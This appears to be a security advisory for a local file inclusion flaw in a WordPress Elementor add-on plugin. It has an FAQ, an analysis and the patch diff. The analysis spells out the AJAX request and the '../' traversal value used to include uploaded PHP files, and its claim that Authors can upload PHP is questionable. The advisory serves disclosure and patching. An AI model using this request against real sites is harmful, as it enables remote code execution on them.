What is CVE-2026-3425?

CVE-2026-3425 is a high-severity vulnerability in the RTMKit Addons for Elementor plugin for WordPress. It allows authenticated users with Author-level access to exploit a Local File Inclusion (LFI) flaw via the ‘path’ parameter in the ‘get_content’ AJAX action, potentially leading to remote code execution.

How does the vulnerability work?

The vulnerability arises from the lack of proper validation and authorization checks in the ‘get_content’ method. An attacker can manipulate the ‘path’ parameter to include arbitrary PHP files on the server, allowing the execution of malicious code.

Who is affected by this vulnerability?

All users of the RTMKit Addons for Elementor plugin version 2.0.2 and below are affected. Specifically, authenticated users with Author-level permissions or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the RTMKit Addons for Elementor plugin you are using. If it is version 2.0.2 or earlier, your site is at risk. Additionally, review your site’s logs for any unauthorized access attempts.

How can I fix CVE-2026-3425?

To fix CVE-2026-3425, update the RTMKit Addons for Elementor plugin to version 2.0.3 or later, where the vulnerability has been patched. Ensure that you regularly update all plugins to maintain security.

What does the CVSS score of 8.8 indicate?

The CVSS score of 8.8 indicates a high severity level, meaning that exploitation could lead to significant impact, such as unauthorized access to sensitive data or remote code execution. Administrators should prioritize addressing this vulnerability.

What are the practical risks of this vulnerability?

If exploited, this vulnerability can allow attackers to execute arbitrary PHP code, bypass access controls, and access sensitive data. This could lead to full compromise of the affected WordPress site.

What is a proof of concept in this context?

The proof of concept provided illustrates how an attacker can exploit the vulnerability by logging in as an Author-level user and sending a crafted request to include a malicious PHP file. This demonstrates the ease of exploitation and the potential impact.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider restricting access to the affected AJAX action or disabling the plugin until a patch can be applied. Additionally, monitor your site for any suspicious activity.

How can I secure my WordPress site against similar vulnerabilities?

To enhance security, regularly update all plugins and themes, use strong user roles and permissions, and implement security plugins that can help detect and prevent unauthorized access. Regular security audits are also recommended.

Where can I find more information about this vulnerability?

More information about CVE-2026-3425 can be found on the official CVE database, security advisories from WordPress, and security blogs that cover vulnerabilities in WordPress plugins.

What is Local File Inclusion (LFI)?

Local File Inclusion (LFI) is a type of vulnerability that allows an attacker to include files on a server through the web browser. This can lead to unauthorized access of sensitive files and execution of malicious scripts.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 12, 2026

CVE-2026-3425: RTMKit Addons for Elementor <= 2.0.2 – Authenticated (Author+) Local File Inclusion via 'path' (rometheme-for-elementor)

CVE ID CVE-2026-3425

Plugin rometheme-for-elementor

Severity High (CVSS 8.8)

CWE 98

Vulnerable Version 2.0.2

Patched Version 2.0.3

Disclosed May 11, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3425: This vulnerability allows authenticated attackers with Author-level access to include and execute arbitrary PHP files through the ‘path’ parameter of the ‘get_content’ AJAX action in the RTMKit Addons for Elementor plugin, affecting versions up to and including 2.0.2 with a CVSS score of 8.8.

The root cause exists in the `get_content` method within `/rometheme-for-elementor/Inc/Core/PluginApi.php` (lines 59-74 in the vulnerable version). The original code directly concatenated user-supplied input from `$_POST[‘path’]` into a file path without validating which menu the path belonged to: `$file = RTM_KIT_DIR . ‘views/’ . $path . ‘.php’;`. It only checked if the resulting file existed via `file_exists($file)`. The code lacked any authorization check beyond a nonce verification, meaning any authenticated user who could obtain the nonce (which is exposed on admin pages accessible to Author roles) could trigger this function.

The attack vector uses the WordPress AJAX endpoint `/wp-admin/admin-ajax.php`. An attacker sends a POST request with `action=get_content`, `nonce=`, and `path=../../wp-content/uploads/malicious`. The plugin constructs a path by prepending `RTM_KIT_DIR . ‘views/’` and appending `.php`, but path traversal sequences like `../` allow escaping the intended `views/` directory. Author-level users can upload PHP files (e.g., via the WordPress media uploader or plugin/theme editors) and then include them through this traversal to achieve code execution.

The patch adds two critical protections. First, it injects an authorization check before any path processing: `if (!current_user_can(‘manage_options’)) { wp_send_json_error(‘Access Denied.’); … }` . This restricts the function to administrators only. Second, the patch replaces the direct path concatenation with a menu-based validation system. Instead of accepting an arbitrary path string, it passes `$_POST[‘path’]` to `get_menu_by_path()` (added in `/rometheme-for-elementor/Inc/Modules/Menu.php`), which searches an internal menu array for a matching key and returns the associated `render_view` path. This ensures only predefined view files can be loaded.

Successful exploitation allows an authenticated attacker to achieve Remote Code Execution by including arbitrary PHP files present on the server. This can bypass access controls, retrieve sensitive database credentials from configuration files, or execute malicious code uploaded via other means. The inclusion can also expose sensitive data through PHP error messages or direct output of non-PHP files interpreted as PHP.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/rometheme-for-elementor/Inc/Core/PluginApi.php
+++ b/rometheme-for-elementor/Inc/Core/PluginApi.php
@@ -37,6 +37,12 @@
         // Load the sidebar view file

         check_ajax_referer('rtmkit_nonce', 'nonce');
+
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
+
         if (!file_exists(RTM_KIT_DIR . 'views/sidebar.php')) {
             wp_send_json_error('Sidebar view file not found.');
             return;
@@ -50,15 +56,23 @@
     public function get_content()
     {
         check_ajax_referer('rtmkit_nonce', 'nonce');
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
+        $path = sanitize_text_field($_POST['path']);
+        $menus = RTMKitModulesMenu::instance()->get_menu_by_path($_POST['path']);

         if (!isset($_POST['path'])) {
             wp_send_json_error('Path not specified.');
             return;
         }
-        $path = sanitize_text_field($_POST['path']);
-        $file = RTM_KIT_DIR . 'views/' . $path . '.php';
-        if (!file_exists($file)) {
-            return '';
+
+        if (isset($menus['render_view']) && file_exists($menus['render_view'])) {
+            $file = $menus['render_view'];
+        } else {
+            wp_send_json_error('View file not found for the specified path.');
+            return;
         }
         ob_start();
         require_once $file;
--- a/rometheme-for-elementor/Inc/Elements/PricingTable.php
+++ b/rometheme-for-elementor/Inc/Elements/PricingTable.php
@@ -24,8 +24,7 @@
         $icon = 'rkit-widget-icon ' . $this->get_widget_data()['icon'];
         return $icon;
     }
-
-
+
     public function get_categories()
     {
         return ['romethemekit_widgets'];
--- a/rometheme-for-elementor/Inc/Elements/SocialIcon.php
+++ b/rometheme-for-elementor/Inc/Elements/SocialIcon.php
@@ -74,9 +74,9 @@
                 'pointer-on-hover' => esc_html('Pointer On Hover'),
             ],
             'default' => 'flat',
-            'condition' => [
-                'select_color' => 'official'
-            ]
+            // 'condition' => [
+            //     'select_color' => 'official'
+            // ]
         ]);

         $ss = new ElementorRepeater();
@@ -472,6 +472,17 @@
             ]
         ]);

+         $this->add_control('social_pointer_color_normal', [
+            'label' => esc_html('Pointer Color'),
+            'type'  => ElementorControls_Manager::COLOR,
+            'selectors' => [
+                '{{WRAPPER}} .rkit-social-share__link' => '--color:{{VALUE}}'
+            ],
+            'condition' => [
+                'select_skin' => ['pointer', 'pointer-on-hover']
+            ]
+        ]);
+
         $this->add_group_control(
             ElementorGroup_Control_Background::get_type(),
             [
@@ -522,6 +533,17 @@
             ]
         ]);

+        $this->add_control('social_pointer_color_normal', [
+            'label' => esc_html('Pointer Color'),
+            'type'  => ElementorControls_Manager::COLOR,
+            'selectors' => [
+                '{{WRAPPER}} .rkit-social-share__link:hover' => '--color:{{VALUE}}'
+            ],
+            'condition' => [
+                'select_skin' => ['pointer', 'pointer-on-hover']
+            ]
+        ]);
+
         $this->add_group_control(
             ElementorGroup_Control_Background::get_type(),
             [
--- a/rometheme-for-elementor/Inc/Modules/Helper/EditorCanvas.php
+++ b/rometheme-for-elementor/Inc/Modules/Helper/EditorCanvas.php
@@ -26,23 +26,34 @@
             add_action('wp_ajax_get_installed_templates', [$this, 'get_installed_templates']);
             add_action('wp_ajax_get_installed_template', [$this, 'get_installed_template']);
             add_action('wp_ajax_get_template_content', [$this, 'get_template_content']);
-            add_action('wp_ajax_is_pro_active' , [$this , 'is_pro_active']);
+            add_action('wp_ajax_is_pro_active', [$this, 'is_pro_active']);
         }
     }

-    public function is_pro_active() {
-        check_ajax_referer('rtmkit_nonce' , 'nonce');
+    public function is_pro_active()
+    {
+        check_ajax_referer('rtmkit_nonce', 'nonce');

         wp_send_json_success(RTMKitCorePlugin::instance()->pro_is_active());
     }

     public function template_category()
     {
+        check_ajax_referer('rtmkit_nonce', 'nonce');
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
         wp_send_json_success(RTMKitModulesTemplatekitsTemplatekitAPI::instance()->get_template_categories());
     }

     public function fetch_lib()
     {
+        check_ajax_referer('rtmkit_nonce', 'nonce');
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
         wp_send_json_success(RTMKitModulesTemplatekitsTemplatekitAPI::instance()->_get_template_data('templatekits'));
     }

--- a/rometheme-for-elementor/Inc/Modules/Menu.php
+++ b/rometheme-for-elementor/Inc/Modules/Menu.php
@@ -42,6 +42,7 @@
                     'function' => [$this, 'rtmkit_root_page'],
                     'icon_url' => RTM_KIT_URL . 'assets/images/romethemekit.svg',
                     'position' => 20,
+                    'render_view' => RTM_KIT_DIR . 'views/dashboard.php',
                 ],
             ],

@@ -51,60 +52,69 @@
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=widgets',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/widgets.php',
                 ],
                 'modules' => [
                     'title' => __('Modules', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=modules',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/modules.php',
                 ],
                 'themebuilder' => [
                     'title' => __('Theme Builder', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=themebuilder',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/themebuilder.php',
                 ],
                 'templates' => [
                     'title' => __('Template Kits', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=templates',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/templates.php',
                 ],
             ],

             'settings' => [
-                'settings' => [
+                'global-kit-setup' => [
                     'title' => __('Global Kit Setup', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
-                    'menu_slug' => 'rtmkit&path=settings',
+                    'menu_slug' => 'rtmkit&path=global-kit-setup',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/settings.php',
                 ],
                 'updates' => [
                     'title' => __('Version Controls', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=updates',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/updates.php',
                 ],
             ],

             'information' => [
                 'submission' => [
-                    'title' => __('Submission', 'rometheme-for-elementor'),
+                    'title' => __('Submissions', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=submission',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/submission.php',
                 ],
                 'system-status' => [
                     'title' => __('System Info', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=system-status',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/system-status.php',
                 ],
                 'documentation' => [
                     'title' => __('Help & Center', 'rometheme-for-elementor'),
                     'capability' => 'read',
                     'menu_slug' => 'rtmkit&path=help',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/help.php',
                 ],
             ],
         ];
@@ -235,7 +245,7 @@
         $wp_admin_bar->add_node([
             'id' => 'rtmkit_submission',
             'parent' => 'rtmkit_menu_bar',
-            'title' => 'Submission',
+            'title' => 'Submissions',
             'href' => admin_url('admin.php?page=rtmkit&path=submission'),
         ]);

@@ -369,4 +379,31 @@
             wp_enqueue_script('rtmkit-new-features', RTM_KIT_URL . 'assets/js/rtmkit-new-feature.js', [], RTM_KIT_VERSION, true);
         }
     }
+
+    protected function findByKey(array $array, string $searchKey)
+    {
+        foreach ($array as $key => $value) {
+
+            // Kalau key ketemu
+            if ($key === $searchKey) {
+                return $value;
+            }
+
+            // Kalau value masih array, lanjut cari ke dalam
+            if (is_array($value)) {
+                $result = $this->findByKey($value, $searchKey);
+                if ($result !== null) {
+                    return $result;
+                }
+            }
+        }
+
+        return null;
+    }
+
+    public function get_menu_by_path(string $path)
+    {
+        $menus = $this->get_menus();
+        return $this->findByKey($menus, $path);
+    }
 }
--- a/rometheme-for-elementor/Inc/Modules/Themebuilder/ThemebuilderAPI.php
+++ b/rometheme-for-elementor/Inc/Modules/Themebuilder/ThemebuilderAPI.php
@@ -20,6 +20,7 @@
             add_action('wp_ajax_get_themebuilder_table', [$this, 'get_themebuilder_table']);
             add_action('wp_ajax_add_themebuilder', [$this, 'add_themebuilder']);
             add_action('wp_ajax_edit_themebuilder', [$this, 'edit_themebuilder']);
+            add_action('wp_ajax_install_requirements', [$this, 'install_requirements']);
         }
     }

@@ -126,4 +127,46 @@
             wp_send_json_error('Failed Save Template');
         }
     }
+
+    public function install_requirements()
+    {
+        if (!current_user_can('manage_options')) {
+            wp_die();
+        }
+
+         check_ajax_referer('rtmkit_nonce', 'nonce');
+
+        include_once ABSPATH . 'wp-admin/includes/plugin.php';
+        include_once ABSPATH . 'wp-admin/includes/file.php';
+        include_once ABSPATH . 'wp-admin/includes/misc.php';
+        include_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
+
+        $plugin = $_POST['plugin'];
+        $plugin_file = WP_PLUGIN_DIR . '/' . $plugin;
+        $plugin_slug = dirname($plugin);
+
+        if (file_exists($plugin_file)) {
+            // Activate the plugin if already installed but inactive
+            ob_start();
+            activate_plugin($plugin);
+            ob_clean();
+            ob_end_clean();
+            wp_send_json_success("Install and Activate Successfully");
+        } else {
+            ob_start();
+            $plugin_download_url = "https://downloads.wordpress.org/plugin/{$plugin_slug}.latest-stable.zip"; // Adjust URL structure
+            $upgrader = new Plugin_Upgrader();
+            $result = $upgrader->install($plugin_download_url);
+
+            if (is_wp_error($result)) {
+                wp_send_json_error();
+            }
+            $activate_result = activate_plugin($plugin);
+            if (is_wp_error($activate_result)) {
+                wp_send_json_error('Plugin installed but failed to activate: ' . $activate_result->get_error_message());
+            }
+
+            wp_send_json_success('Plugin installed and activated successfully.');
+        }
+    }
 }
--- a/rometheme-for-elementor/Inc/Modules/Themebuilder/ThemebuilderModule.php
+++ b/rometheme-for-elementor/Inc/Modules/Themebuilder/ThemebuilderModule.php
@@ -113,11 +113,9 @@
             return true;
         }

-        // Pastikan struktur include/exclude ada
         $includes = isset($conditions['include']) ? (array) $conditions['include'] : [];
         $excludes = isset($conditions['exclude']) ? (array) $conditions['exclude'] : [];

-        // 🔹 Helper function: cek apakah kondisi cocok
         $match_condition = function ($cond) {

             if (empty($cond['page'])) {
@@ -127,124 +125,224 @@
             $page = $cond['page'];
             $sub  = isset($cond['sub']) ? $cond['sub'] : [];

-            // === 🔸 ENTIRE SITE ===
+            $normalize = function ($val) {
+                if ($val === true || $val === null || $val === '') {
+                    return [true];
+                }
+                return is_array($val) ? $val : [$val];
+            };
+
+            // ===== ENTIRE =====
             if ($page === 'entire') {
                 return true;
             }

-            // === 🔸 ARCHIVES ===
+            // ===== ARCHIVES =====
             if ($page === 'archives' && (is_archive() || is_home())) {
+
                 if (empty($sub)) return true;

                 foreach ($sub as $key => $val) {
+
                     switch ($key) {
+
                         case 'all':
                             return true;
+
                         case 'author':
-                            if (is_author($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_author($v)) return true;
+                            }
                             break;
+
                         case 'search':
                             if (is_search()) return true;
                             break;
+
                         case 'post_archive':
                             if (is_home()) return true;
                             break;
+
                         case 'categories':
-                            if (is_category($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_category($v)) return true;
+                            }
                             break;
+
                         case 'tags':
-                            if (is_tag($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_tag($v)) return true;
+                            }
                             break;
                     }
                 }
+
+                return false;
             }

-            // === 🔸 SINGULAR ===
+            // ===== SINGULAR =====
             if ($page === 'singular' && is_singular()) {
+
                 if (empty($sub)) return true;

                 foreach ($sub as $key => $val) {
+
                     switch ($key) {
+
                         case 'all':
                             return true;
+
                         case 'front_page':
                             if (is_front_page() || (is_home() && !is_paged())) return true;
                             break;

                         case 'posts':
-                            if (get_post_type() === 'post' && (empty($val) || get_the_ID() == $val)) return true;
+                            if (get_post_type() === 'post') {
+                                foreach ($normalize($val) as $v) {
+                                    if ($v === true || get_the_ID() == $v) return true;
+                                }
+                            }
                             break;
+
                         case 'pages':
-                            if (get_post_type() === 'page' && (empty($val) || get_the_ID() == $val)) return true;
+                            if (get_post_type() === 'page') {
+                                foreach ($normalize($val) as $v) {
+                                    if ($v === true || get_the_ID() == $v) return true;
+                                }
+                            }
                             break;
+
                         case 'post_category':
-                            if (is_single() && has_category($val)) return true;
+                            if (is_single()) {
+                                foreach ($normalize($val) as $v) {
+                                    if (has_category($v)) return true;
+                                }
+                            }
                             break;
+
                         case 'post_tag':
-                            if (is_single() && has_tag($val)) return true;
+                            if (is_single()) {
+                                foreach ($normalize($val) as $v) {
+                                    if (has_tag($v)) return true;
+                                }
+                            }
                             break;
+
                         case 'post_author':
-                            if (is_single() && get_post_field('post_author', get_the_ID()) == $val) return true;
+                            if (is_single()) {
+                                foreach ($normalize($val) as $v) {
+                                    if (get_post_field('post_author', get_the_ID()) == $v) return true;
+                                }
+                            }
                             break;
+
                         case 'page_author':
-                            if (is_page() && get_post_field('post_author', get_the_ID()) == $val) return true;
-                            break;
-                        case 'author':
-                            if (is_author($val)) return true;
+                            if (is_page()) {
+                                foreach ($normalize($val) as $v) {
+                                    if (get_post_field('post_author', get_the_ID()) == $v) return true;
+                                }
+                            }
                             break;
                     }
                 }
+
+                return false;
             }

-            // === 🔸 WOO ===
+            // ===== WOOCOMMERCE =====
             if ($page === 'woocommerce' && function_exists('is_woocommerce')) {
+
                 if (empty($sub)) return is_woocommerce();

                 foreach ($sub as $key => $val) {
+
                     switch ($key) {
+
                         case 'shop':
                             if (is_shop()) return true;
                             break;
+
                         case 'product_archive':
                             if (is_post_type_archive('product')) return true;
                             break;
+
                         case 'single_product':
-                            if (is_product() && (empty($val) || get_the_ID() == $val)) return true;
+                            if (is_product()) {
+                                foreach ($normalize($val) as $v) {
+                                    if ($v === true || get_the_ID() == $v) return true;
+                                }
+                            }
                             break;
+
                         case 'product_categories':
-                            if (is_product_category($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_product_category($v)) return true;
+                            }
                             break;
+
                         case 'product_tags':
-                            if (is_product_tag($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_product_tag($v)) return true;
+                            }
                             break;
+
                         case 'product_author':
-                            if (is_singular('product') && get_post_field('post_author', get_the_ID()) == $val) return true;
+                            if (is_singular('product')) {
+                                foreach ($normalize($val) as $v) {
+                                    if (get_post_field('post_author', get_the_ID()) == $v) return true;
+                                }
+                            }
                             break;
                     }
                 }
+
+                return false;
             }
-            // === 🔸 404 ===
+
+            // ===== 404 =====
             if ($page === 'error_404' && is_404()) {
                 return true;
             }

             return false;
         };
-        // 🔹 Jika ada kondisi EXCLUDE yang cocok → langsung FALSE
-        foreach ($excludes as $cond) {
-            if ($match_condition($cond)) {
+
+        // ===== INCLUDE FIRST =====
+        if (!empty($includes)) {
+
+            $includeMatched = false;
+
+            foreach ($includes as $cond) {
+                if ($match_condition($cond)) {
+                    $includeMatched = true;
+                    break;
+                }
+            }
+
+            if (!$includeMatched) {
                 return false;
             }
+
+            // jika include match, cek exclude
+            foreach ($excludes as $cond) {
+                if ($match_condition($cond)) {
+                    return false;
+                }
+            }
+
+            return true;
         }
-        // 🔹 Jika ada kondisi INCLUDE yang cocok → TRUE
-        foreach ($includes as $cond) {
+
+        // ===== ONLY EXCLUDE =====
+        foreach ($excludes as $cond) {
             if ($match_condition($cond)) {
-                return true;
+                return false;
             }
         }
+
         return true;
     }
-
+
     public function load_themebuilder()
     {
         $active_themebuilder = RTMKitModulesThemebuilderThemebuilderStorage::instance()->get_active_themebuilder();
--- a/rometheme-for-elementor/Inc/Modules/Widgets/WidgetModule.php
+++ b/rometheme-for-elementor/Inc/Modules/Widgets/WidgetModule.php
@@ -19,6 +19,7 @@
         RTMKitModulesWidgetsWidgetStorage::instance()->init();
         add_action('elementor/elements/categories_registered', [$this, 'add_elementor_widget_categories']);
         add_action('wp_enqueue_scripts', [$this, 'enqueue_widget_style'], 1);
+        add_action('elementor/editor/before_enqueue_scripts', [$this, 'pro_js']);
         new RTMKitModulesHelperSavedTemplateEditor();
     }

@@ -142,4 +143,17 @@
 <?php
         }
     }
+
+    function pro_js()
+    {
+        $list_widgets_pro = RTMKitModulesWidgetsWidgetStorage::instance()->get_widget_data("pro");
+
+        if (ElementorPlugin::$instance->editor->is_edit_mode()) {
+            wp_enqueue_script('rtmprojs', RTM_KIT_URL . 'assets/js/rtmwp.js', ['jquery' , 'wp-i18n'], RTM_KIT_VERSION, true);
+            wp_localize_script('rtmprojs', 'rtmpro', [
+                'is_pro' =>  RTMKitCorePlugin::instance()->pro_is_active() ? 'true' : 'false',
+                'widgets' => $list_widgets_pro
+            ]);
+        }
+    }
 }
--- a/rometheme-for-elementor/Inc/Modules/Widgets/WidgetStorage.php
+++ b/rometheme-for-elementor/Inc/Modules/Widgets/WidgetStorage.php
@@ -182,6 +182,11 @@
         // Cek keamanan nonce
         check_ajax_referer('rtmkit_nonce', 'nonce');

+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
+
         // Ambil body JSON
         $rawInput = file_get_contents('php://input');
         $dataJson = json_decode($rawInput, true);
@@ -280,6 +285,10 @@
     {
         // Cek keamanan nonce
         check_ajax_referer('rtmkit_nonce', 'nonce');
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }

         delete_option('rkit-widget-options');

--- a/rometheme-for-elementor/Inc/Themebuilder/HeaderFooter.php
+++ b/rometheme-for-elementor/Inc/Themebuilder/HeaderFooter.php
@@ -77,7 +77,7 @@
                         RTMKitModulesThemebuilderThemebuilderStorage::instance()->get_themebuilder_content($header_id)
                     );
                 echo $fullHeader;
-                break;
+                // break;
             }
         }
     }
--- a/rometheme-for-elementor/RomeTheme.php
+++ b/rometheme-for-elementor/RomeTheme.php
@@ -3,20 +3,20 @@
 /**
  * Plugin Name:       RTMKit Addons for Elementor
  * Description:      The best toolkit solution for Elementor. Enjoy advanced addons, theme builders, forms, icons, and ready-made templates to create stunning websites quickly and effortlessly.
- * Version:           2.0.2
+ * Version:           2.0.3
  * Author:            Rometheme
  * Author URI: 	  	  https://rometheme.net/
  * License : 		  GPLv3 or later
  * Requires Plugins : elementor
- * Elementor tested up to: 3.30.2
- * Elementor Pro tested up to: 3.30.0
+ * Elementor tested up to: 3.35.0
+ * Elementor Pro tested up to: 3.35.0
  * Text Domain:      rometheme-for-elementor
  * The best toolkit solution for Elementor. Enjoy advanced addons, theme builders, forms, icons, and ready-made templates to create stunning websites quickly and effortlessly.
  */
 if (!defined('ABSPATH')) {
     exit; // Exit if accessed directly
 }
-defined('RTM_KIT_VERSION') || define('RTM_KIT_VERSION', '2.0.2');
+defined('RTM_KIT_VERSION') || define('RTM_KIT_VERSION', '2.0.3');
 defined('RTM_KIT_DIR') || define('RTM_KIT_DIR', plugin_dir_path(__FILE__));
 defined('RTM_KIT_URL') || define('RTM_KIT_URL', plugin_dir_url(__FILE__));
 defined('RTM_KIT_FILE') || define('RTM_KIT_FILE', __FILE__);
--- a/rometheme-for-elementor/views/dashboard.php
+++ b/rometheme-for-elementor/views/dashboard.php
@@ -91,10 +91,10 @@
                     </div>
                 </div>
                 <div class="col-sm-5 col-md-5 col-lg-5 col-xl-5 col-4 col-xxl-4">
-                    <div class="card rounded-4 text-center  flex-column justify-content-center align-items-center gap-3 p-2 h-100" style="background-image: url(<?php echo esc_url(RTM_KIT_URL . 'assets/images/banner-bg.png') ?>); background-size:cover; background-repeat:no-repeat;">
-                        <span class="accent-color fs-5">UPGRADE TO PRO</span>
-                        <h1 class="m-0 fw-light fs-1 text-center lh-1">Unlock Now<br /><span class="fw-bold fs-1 lh-1 text-white">Hi-End Power</span></h1>
-                        <span class="text-white">
+                    <div class="card rounded-4 text-center  flex-column justify-content-center align-items-center gap-3 p-4 h-100" style="background-image: url(<?php echo esc_url(RTM_KIT_URL . 'assets/images/banner-bg.png') ?>); background-size:cover; background-repeat:no-repeat;">
+                        <h4 class="accent-color fs-6">UPGRADE TO PRO</h4>
+                        <h1 class="m-0 fw-light fs-2 text-center lh-1">Unlock Now<br /><span class="fw-bold fs-2 lh-1 text-white">Hi-End Power</span></h1>
+                        <span class="text-white px-2">
                             Unlock the full power of your workflow. Access 70+ widgets, 25+ templates, 9 theme builder features, 1200+ icons, extensions, and priority support. Only in RTMkit Pro.
                         </span>
                         <a href="https://rometheme.net/plugins/rtmkit/pricing/" target="_blank" class="btn btn-accent fw-bold align-items-center gap-2">
--- a/rometheme-for-elementor/views/installed_templates.php
+++ b/rometheme-for-elementor/views/installed_templates.php
@@ -109,7 +109,7 @@
                                 </span>
                             </label>
                         <?php else : ?>
-                            <a href="http://localhost/wp.new/wp-admin/admin.php?page=rtmkit-upgrade-to-pro" class="btn btn-accent fw-bold" target="_blank">
+                            <a href="https://rometheme.net/plugins/rtmkit/pricing/" class="btn btn-accent fw-bold" target="_blank">
                                 <svg width="30" height="30" viewBox="0 0 24 29" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
                                     <path d="M3.49698 9.00236L4.78398 19.9374H19.227L20.513 9.00236L16.503 11.6754L12.005 5.37836L7.50698 11.6754L3.49698 9.00236ZM2.80598 6.13736L7.00498 8.93736L11.191 3.07636C11.2835 2.94673 11.4056 2.84107 11.5472 2.76816C11.6888 2.69526 11.8457 2.65723 12.005 2.65723C12.1642 2.65723 12.3212 2.69526 12.4628 2.76816C12.6044 2.84107 12.7265 2.94673 12.819 3.07636L17.005 8.93636L21.205 6.13736C21.3639 6.03169 21.5497 5.97368 21.7404 5.97019C21.9312 5.96669 22.119 6.01785 22.2817 6.11762C22.4443 6.2174 22.575 6.36163 22.6584 6.53328C22.7417 6.70493 22.7742 6.89684 22.752 7.08636L21.11 21.0534C21.0816 21.2968 20.9647 21.5213 20.7817 21.6843C20.5986 21.8472 20.3621 21.9373 20.117 21.9374H3.89398C3.6489 21.9373 3.41236 21.8472 3.22931 21.6843C3.04625 21.5213 2.92941 21.2968 2.90098 21.0534L1.25798 7.08736C1.2354 6.89761 1.26767 6.70536 1.35095 6.53337C1.43424 6.36138 1.56506 6.21686 1.72792 6.11691C1.89079 6.01696 2.07889 5.96576 2.26995 5.96939C2.461 5.97301 2.64702 6.0313 2.80598 6.13736ZM12.006 15.9374C11.7433 15.9374 11.4833 15.8858 11.2406 15.7853C10.9979 15.6849 10.7774 15.5376 10.5916 15.3519C10.4059 15.1663 10.2585 14.9458 10.1579 14.7032C10.0573 14.4606 10.0055 14.2005 10.0055 13.9379C10.0054 13.6752 10.0571 13.4151 10.1575 13.1725C10.258 12.9298 10.4052 12.7093 10.5909 12.5235C10.7766 12.3377 10.997 12.1904 11.2397 12.0898C11.4823 11.9892 11.7423 11.9374 12.005 11.9374C12.5354 11.9374 13.0441 12.1481 13.4192 12.5231C13.7943 12.8982 14.005 13.4069 14.005 13.9374C14.005 14.4678 13.7943 14.9765 13.4192 15.3516C13.0441 15.7266 12.5364 15.9374 12.006 15.9374Z" fill="#121416"></path>
                                 </svg>
@@ -151,7 +151,6 @@
                                 <path d="M17.3837 9.26905C17.3933 9.2457 17.3989 9.22152 17.4059 9.19761C17.4118 9.17764 17.4194 9.15852 17.4236 9.13798C17.4321 9.09636 17.4357 9.05389 17.4366 9.0117C17.4366 9.00805 17.4377 9.00439 17.4377 9.00073C17.4377 8.95461 17.4329 8.9082 17.4239 8.86264C17.4197 8.84183 17.4118 8.82242 17.4059 8.80217C17.3989 8.77855 17.3936 8.75464 17.384 8.73158C17.3739 8.70739 17.3601 8.68517 17.3474 8.66239C17.3379 8.64523 17.3306 8.62723 17.3193 8.61064C17.2934 8.57183 17.2642 8.53583 17.2316 8.5032L10.9614 2.23245C10.6869 1.95767 10.2414 1.95767 9.96714 2.23245C9.69236 2.50695 9.69236 2.95217 9.96714 3.22667L15.0356 8.29536L1.26668 8.2827H1.26611C0.87827 8.2827 0.56327 8.59714 0.562988 8.98527C0.562707 9.37367 0.877145 9.68867 1.26555 9.68895L15.0389 9.70161L9.96743 14.7734C9.69264 15.0479 9.69264 15.4931 9.96743 15.7676C10.1047 15.9049 10.2847 15.9735 10.4647 15.9735C10.6447 15.9735 10.8247 15.9049 10.9619 15.7676L17.2318 9.4977C17.2647 9.46508 17.294 9.4288 17.3199 9.38998C17.3317 9.37255 17.3396 9.3537 17.3497 9.33542C17.3618 9.31348 17.375 9.29239 17.3846 9.26905H17.3837Z" fill="currentColor" />
                             </svg>
                             Import</button>
-
                     </div>
                 </div>
             </div>
@@ -188,7 +187,7 @@
                                 </span>
                             </label>
                         <?php else : ?>
-                            <a href="http://localhost/wp.new/wp-admin/admin.php?page=rtmkit-upgrade-to-pro" class="btn btn-accent fw-bold" target="_blank">
+                            <a href="https://rometheme.net/plugins/rtmkit/pricing/" class="btn btn-accent fw-bold" target="_blank">
